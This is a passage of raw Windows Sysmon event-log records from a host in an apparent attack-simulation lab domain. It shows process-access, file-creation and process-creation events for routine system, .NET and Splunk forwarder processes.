AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.546{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9181-6005-B202-00000000A301}4396C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.530{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9181-6005-B202-00000000A301}4396C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.530{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9181-6005-B202-00000000A301}4396C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.405{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9181-6005-B002-00000000A301}4836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.390{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9181-6005-B002-00000000A301}4836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.390{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9181-6005-B002-00000000A301}4836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:45.311{59A5CD1D-9180-6005-AE02-00000000A301}4880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1310-0\System.ServiceModel.Web.dll2021-01-18 13:47:45.311 10341000x80000000000000006913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9182-6005-B402-00000000A301}3152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.843{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9182-6005-B402-00000000A301}3152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.843{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9182-6005-B402-00000000A301}3152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:46.749{59A5CD1D-9181-6005-B202-00000000A301}4396C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\112c-0\System.Speech.dll2021-01-18 13:47:46.749 10341000x80000000000000006909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.483{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9182-6005-B302-00000000A301}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.483{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.483{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.483{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.483{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.483{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.483{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.483{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.483{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.483{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.483{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9182-6005-B302-00000000A301}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.483{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9182-6005-B302-00000000A301}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.343{59A5CD1D-9182-6005-B302-00000000A301}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.561{59A5CD1D-9183-6005-B602-00000000A301}34643004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.421{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9183-6005-B602-00000000A301}3464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 